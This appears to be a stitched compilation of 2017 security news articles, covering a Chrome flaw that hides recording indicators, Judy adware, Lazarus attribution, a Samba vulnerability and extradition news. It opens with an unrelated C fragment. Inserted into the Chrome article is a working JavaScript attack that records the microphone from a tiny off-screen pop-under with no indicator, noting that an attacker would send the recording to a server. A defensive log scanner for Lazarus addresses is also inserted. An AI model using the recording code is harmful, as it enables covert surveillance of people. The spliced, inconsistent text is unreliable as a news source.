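    const char *const lines[] = { STAT_PLAIN, STAT_SPACES };
    for (size_t i = 0; i < 2; i++) {
        long n = naive_tty_nr(lines[i]), r = robust_tty_nr(lines[i]);
        printf("%-55s naive=%ld robust=%ld (major %d, minor %d) agree=%s\n",
               lines[i], n, r, tty_major(r), tty_minor(r),
               parsers_agree(lines[i]) ? "yes" : "NO");
    }
    return 0;
}
```

On the second line the naive reading returns 1234 (a field shifted by the two spaces in comm) while the anchored parser still returns 34816.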


Chrome design flaw allows sites to record Audio/Video without indication
1.6.2017 securityaffairs Vulnerability

A developer has discovered a flaw in the Chrome browser that could be exploited to secretly record audio/video without indication.
The AOL developer Ran Bar-Zik discovered a disconcerting vulnerability in Google’s Chrome browser that could be exploited by attackers to record audio or video without giving any visual notification or alert.

“After getting the audio\video usage permissions for WebRTC. JS code can record video\audio without showing the graphical red dot in the tab when the record process is running. i.e. – after the permission is given the site can listen to the user whenever he want to. It is done because JS `window.open` method does not give visual indication on record init. ” reads the security advisory.

Web browser based audio-video communications use WebRTC (Web Real-Time Communications) protocol to enable real-time communication over peer-to-peer connections without the use of plugins.

However, to protect against unauthorised streaming of audio and video without the user’s permission, the web browser first requests that users explicitly allow a website to use WebRTC and access the camera and microphone installed on the host. Once granted, the website has access to both camera and microphone until the user explicitly revokes the WebRTC permissions.

Modern browsers notify users when audio or video is being recorded in order to prevent abuses even by previously ‘authorised’ websites.

In Google Chrome, users are notified with a red dot icon that appears on the tab.

“Activating this API will alert the user that the audio or video from one of the devices is being captured. Chrome and Firefox implemented this alert (Recording media is not available in Edge yet).” Bar-Zik wrote on a Medium blog post. “This record indication is the last and the most important line of defense. The general video\audio device permission is required one time only and user can err and grant it by mistake. Once you granted it, that’s it. The record alert is given on ANY stream record usage and will prevent any record without the user knowledge. “

The researcher discovered that the new HTML5 video\audio API has privacy issues on desktop Chrome that allow attackers to use the PC as a surveillance device.

The expert demonstrated that, after the user has granted the general access, it is possible to activate the MediaRecorder from a newly opened headless window.

“Developers can exploit small UX manipulation to activate the MediaRecorder API without alerting the users. The process is quite simple.” reads the analysis shared by the expert. “After granting the general access from the user — Open a headless window and activate the MediaRecorder from that window. In Chrome there will be no visual record indication.”

The issue is related to a design flaw in Chrome that doesn’t display a red-dot indication on headless windows, allowing site developers to “exploit small UX manipulation to activate the MediaRecorder API without alerting the users.”

Bar-Zik also published a proof-of-concept (PoC) code and a demo website that asks the user for permission to use WebRTC, opens a pop-up, and then records 20 seconds of audio without giving any indication to the user.

The demo website has two buttons on a page: the first asks for the device permission, as many websites do; the second launches the attack, and after 30 seconds the user can download an MP3.

In a real attack, hackers could use a very small pop-under, submit the data anywhere and close it while the user is focused elsewhere.

“It can use very small pop-under and submit the data anywhere and close it when the user is focusing on it. It can use the camera for millisecond to get your picture. It can (In theory) use XSS to ride on legitimate sites and their permissions.” Bar-Zik concluded.

The reported design issue affects Google Chrome; its presence in other browsers’ implementations cannot be excluded. The researcher reported the bug to Google on April 10, 2017, but the company doesn’t classify the issue as a security vulnerability; it plans to fix the issue in the future, but not immediately.

“This isn’t really a security vulnerability – for example, WebRTC on a mobile device shows no indicator at all in the browser,” a Chromium member replied to the report. “The dot is a best-first effort that only works on the desktop when we have chrome UI space available. That being said, we are looking at ways to improve this situation.”

To protect your PC, disable WebRTC.


Judy Doesn’t Love You – Judy Malware has a sweet name but may have infected 36 million users
1.6.2017 securityaffairs Android

Experts found a new malware, dubbed Judy malware, in the Play Store; it is designed to infect Android devices and generate false clicks on advertisements.
Google is suffering once again from malicious software found inside popular apps available on the Play Store. The new malware, code named “Judy”, is designed to infect Android devices and generate false clicks on advertisements. According to Check Point Software, which discovered Judy, the payoff for the malware developers is the revenue generated by the false advertising clicks.

The new malicious app bypassed Google checks and may have been inside 41 popular games on the Play store for years, infecting as many as 36 million users.

“Check Point researchers discovered another widespread malware campaign on Google Play, Google’s official app store. The malware, dubbed “Judy”, is an auto-clicking adware which was found on 41 apps developed by a Korean company.” states the analysis published by Check Point. “The malicious apps reached an astonishing spread between 4.5 million and 18.5 million downloads.” “We also found several apps containing the malware, which were developed by other developers on Google Play.” “These apps also had a large amount of downloads between 4 and 18 million, meaning the total spread of the malware may have reached between 8.5 and 36.5 million users.”

The tainted software packages containing the malware were developed by a Korean company and have all been pulled from the Google Play Store. Several other vendor packages have also been pulled that reportedly contained the same malware code. However, it is not clear if these apps were intentionally designed with the Judy malware or simply suffered the same fate because of shared code.


The disclosure comes on the heels of two similar malware programs, “Falseguide” and “Skinner”, which bypassed Google’s safety and check system. All the malware designs appear to be similar in that they used communications links with a Command and Control server for operation. Once the link was established, the Command server would then download the malicious software onto the unsuspecting user’s device.

The malware developers first would design and upload a bait program to the Google Play Store. Most of the bait apps used by Judy appear to be games or simulated doll dress designs aimed at children. The bait programs would appear to be innocent to the user and pass the Google checking system since they contained no malicious code. The apps apparently look valid because they are designed to communicate with a specific URL for additional user game data such as updated dress designs for children’s dolls. Both the user and Google were unaware that the URL was actually a link to the malicious Command server.

Once a user downloaded and started the app, the command server would infect the unknowing user with a silent and invisible web browser driven by JavaScript. The malware used the JavaScript code to locate and click on banners from Google ads once a targeted series of websites had been launched inside the silent web browser. The silent browser would then simulate a user clicking on the paying advertisements and banners. Each infected user would thus unknowingly be clicking thousands of times a day on advertisements. The fake clicks generated revenue for the malware developer and defrauded the paying advertisers.

One feature of Judy, however, was that some of the spammed ads also required the user to click on them in order to get the home screen functional again. While many of the apps were apparently popular, some of them receiving 4- and 5-star reviews, users often complained about the large number of ads they were seeing. This tell-tale clue should have been a warning sign that the apps were doing more than simply dressing simulated dolls.

According to Check Point, the malware apps were all developed by a single Korean company named Kiniwini, registered on Google Play as ENISTUDIO corp.

“The company develops mobile apps for both Android and iOS platform,” states the Check Point bulletin.

“It is quite unusual to find an actual organization behind mobile malware, as most of them are developed by purely malicious actors. It is important to note that the activity conducted by the malware is not borderline advertising, but definitely an illegitimate use of the users’ mobile devices for generating fraudulent clicks, benefiting the attackers.”

Google has recently attempted to beef up its Play Store, releasing new privacy and security guidelines to developers and increasing checks against potentially malevolent software apps. However, the use of a secondary communications channel seems to bypass these security checks, since Google cannot see the hidden malware stored on a separate Command server during the upload and activation process for developers.

It is not unusual for app developers to utilize a communications link to specific URLs. Many games and user applications require a link in order to update common data, generate game revenue and add additional features. The design of using a malicious Command server to install functioning malware is something that previously had been reserved for intelligence agencies and criminal hacker organizations.

While the abuse of millions of users to generate illegal income via hidden clicks on paying ads is not entirely new, there are darker possible designs that can target individual users with more than just advertisements: stealing financial information, violating privacy, stalking and tracking. Both Google and Apple should take note of this new design that can bypass the traditional upload and install security features of their storefronts.


LinkedIn Hacker, Wanted by US & Russia, Can be Extradited to Either State
31.5.2017 thehackernews Social
The alleged Russian hacker, who was arrested by the Czech police in Prague last October on suspicion of massive 2012 data breach at LinkedIn, can be extradited to either the United States or Russia, a Czech court ruled on Tuesday.
Yevgeniy Aleksandrovich Nikulin, a 29-year-old Russian national, is accused of hacking not just LinkedIn, but also the online cloud storage platform Dropbox and the now-defunct social-networking company Formspring.
However, he has repeatedly denied all accusations.
Nikulin was arrested in Prague on October 5 by the Czech police after Interpol issued an international arrest warrant against him.
Nikulin appeared at a court hearing held inside a high-security prison in Prague on Tuesday, looking emaciated after eight months in solitary confinement.
The court ruling, pending appeals, left the final decision in the hands of Czech Justice Minister Robert Pelikan, who can approve extradition to one of the countries and block the other.
The United States has requested Nikulin's extradition for carrying out hacking attacks and stealing information from several American social networking companies, including LinkedIn, Dropbox, and Formspring, between March and July 2012.
However, Russia, where Nikulin is facing a lesser charge, has requested his extradition on a separate cyber theft charge of stealing $3,450 via the Internet in 2009.
"Both [case] documents are very, very sufficient for reasonable suspicion that [the offenses] took place and that there is a reason to press charges," the judge said.
Hacker Claims FBI Pressured Him to Confess to US Election Hacks
Nikulin's arrest last October came three days before the United States officially accused Russia of hacking the Democratic National Committee (DNC) and interfering in the 2016 presidential election.
Nikulin's lawyer says the case is a set-up, suggesting that his arrest may have deeper motives than the cyber attacks against American firms.
The Guardian reported Nikulin was interrogated in Prague, where he currently remains imprisoned, by FBI special agent Jeffrey Miller.
Nikulin wrote in a letter from prison that during his interrogation Miller brought up the US election hacking; he claimed that the FBI agent pressured him to admit to the DNC hack and promised him good treatment if he agreed to cooperate.
Nikulin wrote in the letter that he rejected the offer. His lawyer indicated that Nikulin was not a hacker, but just a victim of an FBI plot.
"Do you really imagine that a high-ranking FBI agent is going to travel all the way from San Francisco just to read this guy his rights?" Nikulin's lawyer said.
Mark Galeotti, a senior security researcher at the Institute of International Relations Prague, also showed his concern about an FBI agent traveling to another country to extradite a hacker.
"An FBI agent traveling from the US to a third country as part of an extradition request is extremely unusual and highlights that the case is seen as significant," Galeotti said, as quoted by the Guardian.
Nikulin's Russian lawyer stated that his client's life revolved around buying and selling luxury cars, adding that Nikulin was "useless with computers", capable of checking his email and no more, and far from being a super-hacker who could hack big firms.
Tuesday's court hearing was held in a tiny room inside the prison for security reasons, to which Nikulin’s Czech lawyer said: "In all my 25 years as a lawyer, I don’t remember any cases being tried inside the prison, including serial killers or organized crime cases."
Now, the final decision is in the hands of the Czech Justice Minister Robert Pelikan, who is slated to decide where Nikulin will be extradited: The United States, where he can face a "disproportionately harsh" sentence of 54 years behind bars, or Russia, where he faces a lesser charge of cyber theft.


Vendors Investigating Impact of Samba Vulnerability
31.5.2017 securityweek Vulnerability
Companies that provide network-attached storage (NAS) appliances, routers and other types of networking devices have started investigating the impact of a recently disclosed Samba vulnerability on their products.

Updates released last week for Samba, the software suite that provides file and print sharing capabilities between Windows and Unix computers, address a remote code execution flaw (CVE-2017-7494) that affects all versions of the product since 3.5.0, released in March 2010. The fix is included in Samba versions 4.6.4, 4.5.10 and 4.4.14, and a workaround has been made available for unsupported versions.

The security hole can be exploited by a malicious client to upload a shared library to a writable share, and then cause the server to load and execute that library.

While some have compared the vulnerability to the SMB weakness exploited in the recent WannaCry ransomware attacks – due to the fact that one of the protocols implemented by Samba is SMB – others believe CVE-2017-7494 is not as dangerous and there have been no reports of attacks in the wild.

On the other hand, proof-of-concept (PoC) exploits have been released and Rapid7 has identified roughly 110,000 Internet-connected devices running vulnerable versions of Samba.

Samba is used in many products, including routers, NAS systems, servers and IoT devices, and several vendors have already started releasing patches and workarounds.

Cisco has so far only identified two vulnerable products: the Cisco Network Analysis Module and the Cisco Video Surveillance Media Server. The list of products still under investigation includes routers, network and content security, unified computing, communications, and video and telepresence solutions.

NETGEAR informed customers that CVE-2017-7494 affects all its ReadyNAS, all ReadyDATA, and several C, R and N series routers. The company has already released firmware fixes for ReadyNAS 6.x. Until patches become available for other devices, users have been advised to disable write access to shared drives, and remove any USB storage devices connected to their routers or gateways.

QNAP and Synology have also started releasing patches for their affected products, but WD does not appear to have published any security advisories, despite several forum posts on this topic.

Veritas has informed customers that it’s working on patches for its NetBackup Appliances. NetApp has determined that the Samba vulnerability only affects its StorageGRID products, for which the company has released workarounds.

Sophos and F5 Networks told users that their products are not vulnerable to attacks exploiting this flaw.


China to Launch Cybersecurity Law Despite Concerns
31.5.2017 securityweek BigBrothers
Beijing - China will implement a controversial cybersecurity law Thursday despite concerns from foreign firms worried about its impact on their ability to do business in the world's second largest economy.

Passed last November, the law is largely aimed at protecting China's networks and private user information at a time when the recent WannaCry ransomware attack showed any country can be vulnerable to cyber threats.

But companies have pleaded with the government to delay the legislation's implementation amid concerns about unclear provisions and how the law would affect personal information and cloud computing.

The government appears to still be scrambling to finalize the rules.

Just two weeks ago, Zhao Zeliang, director of the cybersecurity bureau, gathered some 200 representatives from foreign and domestic companies and industry associations at the new headquarters of the Cybersecurity Administration of China (CAC) in Beijing.

The May 19 discussion centred on a draft of the rules for transferring personal data overseas, participants told AFP.

Attendees received an updated version of the document, as well as Zhao's assurance that regulators would remove some of the language that had received strong objections, they said.

The new document, obtained by AFP, removed a contentious requirement for companies to store customers' personal data in China.

- 'Headaches for companies' -

But concerns remain.

"The regulator is unprepared to enforce the law" and it is "very unlikely" anything will happen on June 1, said one participant, who asked for anonymity to discuss the sensitive issue.

That impression was only strengthened a few days after the meeting, when authorities issued 21 new draft documents describing national standards on topics from cloud computing to financial data, noting they would be available for public comment until July 7.

More new drafts, including detailed guidelines on cross-border data transfers, were published Saturday.

It is "crystal clear that the regulatory regime is evolving and does not simply switch on like a light June 1", said Graham Webster, an expert on Sino-US relations at Yale Law School.

Beijing, he said, is "wrestling with legitimate challenges that every country faces, and ... much of the caution and ambiguity comes from a desire to get things right."

But the process is causing "headaches for companies, Chinese and foreign alike".

- Protecting 'national honour' -

China already has some of the world's tightest controls over web content, protected by what is called "The Great Firewall", but even some of its universities and petrol stations were hit by the global ransomware attack in May.

The draft cybersecurity rules provided at the CAC meeting address only one part of the sweeping law.

The legislation also bans internet users from publishing a wide variety of information, including anything that damages "national honour", "disturbs economic or social order" or is aimed at "overthrowing the socialist system". Companies are worried that the new law could lock them out of the market.

Paul Triolo, a cybersecurity expert at the Eurasia Group, wrote in a research note that regulators will likely introduce "new hurdles for foreign company compliance and operations" in industries, such as cloud computing, where China is actively seeking a competitive advantage.

As a result, "companies with politically well-connected competitors could see their profile raised for things such as cybersecurity reviews".

The European Union Chamber of Commerce, among other groups, has urged Beijing to "delay the implementation of either the law or its relevant articles".

It "will impose substantial compliance obligations on industry" and "cautious, sound, consistent and fully reasoned supporting mechanisms related to its implementation are essential," the group said in a statement last week.

The chamber called on policymakers to follow a "transparent" process that will help eliminate "discriminatory market access barriers".

While there is no indication the law itself will be pushed back, the draft rules distributed at the CAC meeting says companies will have until December 31, 2018 to implement some of its requirements.

"It's been enormously difficult for our companies to prepare for the implementation of the cybersecurity law, because there are so many aspects of the law that are still unclear," said Jake Parker, vice president of the US-China Business Council.

"There's not enough information for companies to be able to develop internal compliance practices."


A new report links North Korea to the Lazarus APT Group
31.5.2017 securityaffairs APT

Moscow-based threat intelligence firm Group-IB published a report that details evidence linking the Lazarus APT Group to North Korea.
Researchers at security firm Group-IB released a report that links the notorious Lazarus APT to North Korea.

The activity of the Lazarus Group surged in 2014 and 2015; its members used mostly custom-tailored malware in their attacks, and experts who investigated the crew consider it highly sophisticated.

This threat actor has been active since at least 2009, possibly as early as 2007, and it was involved in both cyber espionage campaigns and sabotage activities aimed at destroying data and disrupting systems. Security researchers discovered that the North Korean Lazarus APT group was behind recent attacks on banks, including the Bangladesh cyber heist.

According to security experts, the group was behind other large-scale cyber espionage campaigns against targets worldwide, including the Troy Operation, the DarkSeoul Operation, and the Sony Pictures hack.

According to the experts from Group-IB, the attacks against the SWIFT systems used by banks worldwide left the most clues.

The Lazarus APT group conducted massive reconnaissance operations before the bank attacks in order to gather information on the infrastructure of the targets.

“We have detected and thoroughly analyzed the C&C infrastructure used by Lazarus,” explained Dmitry Volkov, Head of Threat Intelligence Department. “Our research shows how hackers gained access to the banks’ information systems, what malware they used, and who their attempts were aimed at.”

Investigating the group's activity, the Group-IB researchers analyzed the complex botnet infrastructure used by the hackers.
To hamper attribution of the attacks, the cyberspies used a three-layer architecture of compromised servers that communicate through SSL encrypted channels.

“In addition to encrypted traffic, data sent through SSL channel was additionally encrypted. The attackers achieved anonymity by employing a legitimate VPN client – SoftEther VPN. In some cases, they also used corporate web servers that were part of the attacked infrastructure.” states the report published by Group-IB.

Lazarus APT 3-Layer Architecture

According to the researchers, the APT group changed its TTPs after the publication of the Operation Blockbuster report that revealed much information about the activity of the crew.

“According to our investigation of the Lazarus infrastructure, the threat actors connected to the end C&C layer (Layer3) from two North Korean IP addresses 210.52.109.22 and 175.45.178.222. The second IP address relates to Potonggang District, perhaps coincidentally, where National Defence Commission is located — the highest military body in North Korea” continues the report.

Investigating the Lazarus attack, Group-IB found that the operators connected to the final C&C layer from two IP addresses.

The first, 210.52.109.22, is assigned to the Chinese provider China Netcom, but according to Group-IB's sources the range 210.52.109.0/24 was allocated to North Korea.

The second, 175.45.178.222, belongs to a North Korean Internet service provider; Whois records place it in the Potonggang District, which is also where the National Defence Commission, the highest military body in North Korea, is located.

“210.52.109.22 belongs to an autonomous system China Netcom. However, some sources indicate that the set of IPs 210.52.109.0/24 is assigned to North Korea. 175.45.178.222 refers to a North Korean Internet service provider. The Whois service indicates that this address is allocated to the Potonggang District, perhaps coincidentally, where National Defence Commission is located — the highest military body in North Korea”
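The two addresses and the /24 range quoted above are the kind of indicator a SOC would sweep its connection logs for. The following is an added example, not code from the Group-IB report: it matches those indicators against firewall-style log lines using network containment rather than string comparison, so hosts anywhere in 210.52.109.0/24 are caught as well. The log lines are constructed for this example, and their layout (timestamp, src=, dst=, dport=) is an assumption; adapt the regex to your own format.

```python
"""Sweep connection logs for the Lazarus C&C source addresses named in the Group-IB report.

Added example, not code from the report. The log format is an assumption; the sample
lines are constructed and use documentation address ranges for the non-indicator hosts.
"""
import ipaddress
import re

# Indicators quoted on the page: two single addresses plus the /24 that Group-IB's
# sources tie to North Korea. Networks rather than strings, so containment works.
LAZARUS_IOCS = [
    ipaddress.ip_network("210.52.109.22/32"),
    ipaddress.ip_network("175.45.178.222/32"),
    ipaddress.ip_network("210.52.109.0/24"),
]

# Constructed sample log (assumed layout): "<ts> src=<ip> dst=<ip> dport=<port>".
SAMPLE_LOG = """\
2017-05-29T02:11:09Z src=10.20.30.40 dst=203.0.113.1 dport=443
2017-05-29T02:11:10Z src=175.45.178.222 dst=203.0.113.7 dport=443
2017-05-29T02:11:12Z src=210.52.109.77 dst=203.0.113.7 dport=8443
2017-05-29T02:11:15Z src=198.51.100.9 dst=210.52.109.22 dport=443
2017-05-29T02:11:16Z src=192.0.2.5 dst=203.0.113.8 dport=80
2017-05-29T02:11:17Z malformed line without addresses
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+src=(?P<src>\S+)\s+dst=(?P<dst>\S+)\s+dport=(?P<dport>\d+)$"
)


def matching_indicator(addr, iocs=LAZARUS_IOCS):
    """Return the first indicator network that contains addr, or None.

    Strings that are not valid IP addresses are treated as non-matching instead of
    raising, so one bad field cannot abort a whole log sweep.
    """
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return None
    for net in iocs:
        if ip in net:
            return net
    return None


def scan_log(text, iocs=LAZARUS_IOCS):
    """Return (timestamp, field, address, indicator) for every line touching an indicator.

    field is 'src' or 'dst', so an analyst can separate inbound connections from
    outbound beaconing when triaging the hits.
    """
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # lines that do not fit the layout are skipped, not fatal
        for field in ("src", "dst"):
            net = matching_indicator(m.group(field), iocs)
            if net is not None:
                hits.append((m.group("ts"), field, m.group(field), str(net)))
    return hits


if __name__ == "__main__":
    for ts, field, addr, net in scan_log(SAMPLE_LOG):
        print(f"{ts} {field}={addr} matches {net}")
```

A hit is a lead, not an attribution: the report itself calls the Potonggang District location "perhaps coincidentally" significant, and a single connection from a /24 that is only reportedly assigned to North Korea deserves the same caution.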

The researchers also found that the Lazarus APT group disguised its operations as the work of Russian hackers, planting false flags in its malware to mislead investigators into attributing the attacks to Russia.

Group-IB experts, like their peers at BAE Systems, found Russian words in the malware's code, but noticed that the words were used incorrectly.

The hackers also used Flash and Silverlight exploits taken from exploit kits built by Russian-speaking hackers, and protected their executables with Enigma Protector, an anti-tampering system for executable files developed by a Russian company.

“They added specific debugging symbols and strings containing Russian words to a new version of Client_TrafficForwarder, a module designed to proxy network traffic.” continues the report. “To protect their executables, they used Enigma Protector, a commercial product, which was created by a Russian software developer. They also used exploits for Flash and SilverLight from sets of exploits created by Russian-speaking hackers. These masquerade techniques did initially mislead some researchers who conducted express analysis of malicious code.”

For more details, see the Group-IB report, which also includes IOCs for the malware used in recent operations attributed to the Lazarus Group.


Chrome Flaw Allows Sites to Secretly Record Audio/Video Without Indication
30.5.2017 thehackernews Vulnerebility
Websites On Chrome Can Secretly Record Audio/Video Without Indication
What if your laptop were listening to everything said during your phone calls, or by other people nearby, and even recording video of your surroundings without your knowledge?
That sounds scary, but this scenario is not only possible, it is easy to accomplish.
A UX design flaw in Google's Chrome browser could allow a malicious website to record audio or video without alerting the user or giving any visual indication that they are being spied on.
AOL developer Ran Bar-Zik reported the issue to Google on April 10, 2017, but the tech giant declined to treat it as a valid security vulnerability, which means no official patch is on the way.
How Browsers Works With Camera & Microphone

Before jumping into the details, you first need to know that browser-based audio and video communication relies on WebRTC (Web Real-Time Communications), a collection of protocols and APIs supported by most modern browsers that enables real-time communication over peer-to-peer connections without plugins.
To prevent audio and video from being captured without the user's consent, the browser first asks the user to explicitly allow a website to access the device's camera and microphone.
Once granted, that permission persists for the site until you manually revoke it.
To keep an 'authorised' website from recording you quietly, browsers also show the user an indicator whenever audio or video is being captured.
"Activating this API will alert the user that the audio or video from one of the devices is being captured," Bar-Zik wrote on a Medium blog post. "This record indication is the last and the most important line of defense."
In the case of Google Chrome, a red dot icon appears on the tab, alerting users that the audio or video streaming is live.
How Websites Can Secretly Spy On You

The researcher discovered that if an authorised website opens a pop-up window from JavaScript (what Bar-Zik calls a "headless" window) and starts the capture there, it can record audio and video without the red dot appearing, so nothing in the browser indicates that a capture is in progress.
"Open a headless window and activate the MediaRecorder from that window. In Chrome there will be no visual record indication," Bar-Zik said.
This happens because Chrome draws the red dot on the tab, and a pop-up window opened this way has no tab strip to draw it on, allowing site developers to "exploit small UX manipulation to activate the MediaRecorder API without alerting the users."
Bar-Zik also provided a proof-of-concept (PoC) code for anyone to download, along with a demo website that asks the user for permission to use WebRTC, launches a pop-up, and then records 20 seconds of audio without giving any visual indication.
All you need to do is click on two buttons to allow the website to use WebRTC in the browser. The demo records your audio for 20 seconds and then provides you a download link for the recorded file.
"Real attack will not be very obvious of course. It can use very small pop-under and submit the data anywhere and close it when the user is focusing on it. It can use the camera for millisecond to get your picture," Bar-Zik said. "In Mobile, there is not such visual indication."
The reported flaw affects Google Chrome, but it may affect other web browsers as well.
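The capture path described above, reconstructed as an added example. This is not Bar-Zik's published PoC and not Chrome code; the function names pickMimeType, popupFeatures, startCapture and recordFromPopup are this example's own, and it assumes that the stream has to be acquired and recorded inside the pop-up's own window, so that no tab owns the capture and the tab-strip indicator has nothing to draw. The recorder wiring is kept synchronous and takes the window as a parameter so it can be exercised with a stand-in window outside a browser.

```javascript
'use strict';
// Added example reconstructing the sequence the article describes; not Bar-Zik's PoC.
// Assumption: the capture must live in the pop-up's realm for Chrome's tab indicator to be absent.

// Container/codec candidates, tried in order; isTypeSupported is the real MediaRecorder API.
const CANDIDATE_MIME_TYPES = ['audio/webm;codecs=opus', 'audio/webm', 'audio/ogg'];

// First MIME type the given MediaRecorder implementation accepts; '' means "use the default".
function pickMimeType(MediaRecorderCtor, candidates = CANDIDATE_MIME_TYPES) {
  for (const type of candidates) {
    if (MediaRecorderCtor.isTypeSupported(type)) return type;
  }
  return '';
}

// window.open feature string for the "very small pop-under" the researcher mentions:
// a 1x1 window parked far off-screen with no toolbar, so there is no tab to carry the red dot.
function popupFeatures(width = 1, height = 1) {
  return `width=${width},height=${height},left=10000,top=10000,toolbar=no,menubar=no,location=no`;
}

// Record `stream` with a MediaRecorder created in `win`'s realm for durationMs, then hand the
// collected chunks and the effective MIME type to onDone. Returns the recorder so the caller
// can inspect its state or stop early.
function startCapture(win, stream, durationMs, onDone) {
  const chunks = [];
  const mimeType = pickMimeType(win.MediaRecorder);
  const recorder = new win.MediaRecorder(stream, mimeType ? { mimeType } : {});
  recorder.ondataavailable = (event) => {
    if (event.data && event.data.size > 0) chunks.push(event.data);
  };
  recorder.onstop = () => {
    stream.getTracks().forEach((track) => track.stop()); // release the device
    onDone(chunks, recorder.mimeType);
  };
  recorder.start();
  win.setTimeout(() => {
    if (recorder.state !== 'inactive') recorder.stop();
  }, durationMs);
  return recorder;
}

// Browser entry point. It must run from a click handler: both the permission prompt and
// window.open are gated on a user gesture. The first getUserMedia call is made in the visible
// tab, where the prompt and the red dot look legitimate; the permission is then remembered for
// the origin, so the same-origin pop-up gets its own stream without a second prompt.
async function recordFromPopup(durationMs = 20000) {
  const probe = await navigator.mediaDevices.getUserMedia({ audio: true });
  probe.getTracks().forEach((track) => track.stop()); // only the grant was needed here
  const popup = window.open('about:blank', 'capture', popupFeatures());
  if (!popup) throw new Error('pop-up blocked');
  const stream = await popup.navigator.mediaDevices.getUserMedia({ audio: true });
  return new Promise((resolve) => {
    startCapture(popup, stream, durationMs, (chunks, type) => {
      popup.close();
      resolve(new Blob(chunks, { type }));
    });
  });
}

if (typeof document !== 'undefined') {
  // Demo page wiring: <button id="rec">Record</button>. A real attacker would POST the blob
  // to a server instead of offering it for download.
  document.getElementById('rec')?.addEventListener('click', async () => {
    const blob = await recordFromPopup();
    const link = document.createElement('a');
    link.href = URL.createObjectURL(blob);
    link.download = 'capture.webm';
    link.textContent = `recording (${blob.size} bytes)`;
    document.body.appendChild(link);
  });
}
```

Because the grant is remembered per origin, the second getUserMedia call prompts for nothing, and the only signal left to the user is the indicator, which is exactly what the pop-up lacks. The reliable fix on the user's side is to revoke the site's microphone and camera permission rather than to watch for the dot.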
It's Not A Flaw, Says Google; So No Quick Patch!
Bar-Zik reported the issue to Google on April 10, 2017, but the company does not consider it a valid security vulnerability, although it said it would look for ways to "improve the situation" in the future.
"This isn't really a security vulnerability – for example, WebRTC on a mobile device shows no indicator at all in the browser," a Chromium member replied to the researcher's report.
"The dot is a best-first effort that only works on the desktop when we have chrome UI space available. That being said, we are looking at ways to improve this situation."
Whether or not Google considers this a security vulnerability, it is certainly a privacy issue, and one that could be chained into more sophisticated attacks.
To stay on the safe side, disable WebRTC if you do not need it. If you do, grant camera and microphone access only to trusted websites, periodically review and revoke those grants in Chrome's site settings (chrome://settings/content), and be wary of any additional windows a site opens after you have granted access.
Edward Snowden leaks also revealed Optic Nerve – the NSA's project to capture webcam images every 5 minutes from random Yahoo users. In just six months, 1.8 Million users' images were captured and stored on the government servers in 2008.
Following such privacy concerns, even Facebook CEO Mark Zuckerberg and former FBI director James Comey admitted that they put tape on their laptops just to be on the safer side.
Although putting a tape over your webcam would not stop hackers or government spying agencies from recording your voice, at least, it would prevent them from watching or capturing your live visual feeds.


Hack DHS Act Establishes Bug Bounty Program for DHS

30.5.2017 securityweek  BigBrothers
Following what is now widespread practice among private-sector tech giants, a new bill proposes to require DHS to introduce its own public-sector bug bounty program.

Senators Maggie Hassan (D-NH) and Rob Portman (R-OH) introduced the Hack Department of Homeland Security (DHS) Act on 25 May. Designated S.1281, it is described as "A bill to establish a bug bounty pilot program within the Department of Homeland Security, and for other purposes."

At the time of writing, there is no publicly published text for the bill. Nevertheless, congress.gov lists it as having been read twice and referred to the Committee on Homeland Security and Governmental Affairs.

Hassan publicly announced the new bill on Friday. She described it as designed to "strengthen cyber defenses at DHS by utilizing 'white-hat' or ethical hackers to help identify unique and undiscovered vulnerabilities in the DHS networks and data systems." It is modeled on the bug bounty programs of the tech industry, and last year's 'hack the Pentagon' and 'hack the Army' programs.

Spanning April and May 2016, the Department of Defense (DoD) ran 'Hack the Pentagon' via HackerOne. It attracted more than 1400 hackers; 250 of whom submitted at least one vulnerability report. 138 were judged valid and eligible for a bounty from the program's $150,000 funding. Ash Carter, Secretary of Defense at the time, estimated that the program saved the department more than $800,000 against the cost of a similar exercise via the security industry.

Since then both the Army and the Air Force have engaged similar programs. Hack the Army ran from the end of November to 21 December 2016. 371 white-hat hackers registered and submitted a total of 471 vulnerability reports. Nearly 120 were adjudged actionable and were awarded a total of more than $100,000.

Hack the Air Force was announced in April 2017, and registrations opened on 15 May. The event will take place between May 30 and June 23, and is open to researchers from any of the Five Eyes nations: US, UK, Canada, Australia and New Zealand.

"Federal agencies like DHS are under assault every day from cyberattacks," explained Hassan in her statement Friday. "These attacks threaten the safety, security and privacy of millions of Americans and in order to protect DHS and the American people from these threats, the Department will need help. The Hack DHS Act provides this help by drawing upon an untapped resource -- patriotic and ethical hackers across the country who want to stop these threats before they endanger their fellow citizens."

"The networks and systems at DHS are vital to our nation's security," said Portman. "It's imperative that we take every step to protect DHS from the many cyber attacks they face every day. One step to do that is using an important tool from the private sector: incentivizing ethical hackers to find vulnerabilities before others do. I look forward to working with Senator Hassan to move this bipartisan bill forward and helping protect DHS from cyber threats."

The bill is getting cautious support from the private sector. "The proposed Hack DHS Act seems, on its surface, to be a very positive step forward to helping better secure the nation's websites and other web-facing infrastructure," Nathan Wenzler, chief security strategist at security consulting firm AsTech, told SecurityWeek. He pointed to the continuing success of bug bounties in the private sector. "Provided that appropriate measures are taken to vet the individuals who are performing the ethical hacking work, this could end up being a very valuable tool to help improve the security posture of some of the most heavily attacked sites out there."

Chris Roberts, chief security architect at threat detection firm Acalvio, takes a similar view. Provided that adequate checks are made against the registrants and strict rules are devised and enforced, then "yes, in the 'spirit' of hacking it's good."

But he warned, "Let's not devalue the red-team work and have someone hit the systems from all angles and all sides. That way there's a true perspective. The whole idea of hacking the DHS would be to focus on the weakest links, which are humans and third parties. I'm going to assume those are out of scope, which in reality, makes it kind of a waste of time. On paper, it's a good idea. But allow us to hit whenever and wherever we want, like a true attacker would and then let's talk. Until then, it's simply a face-saving thing which cheapens the whole assessment side of the world."


Czech Court OKs Hacker's Extradition to US or Russia

30.5.2017 securityweek  Cyber

Prague - A Czech court on Tuesday ruled Prague can extradite a Russian citizen sought by the US for alleged cyberattacks on social networks and also by his native Russia on fraud charges.

Suspect Yevgeni Nikulin, who alleges FBI agents linked him to attacks on the US Democratic Party, immediately filed an appeal against the verdict, sending the case to the Czech High Court.

"The Prague municipal court has ruled that Mr Nikulin can be extradited to either country," court spokeswoman Marketa Puci told AFP.

The hearing took place at a Prague prison where the 29-year-old suspect is being held.

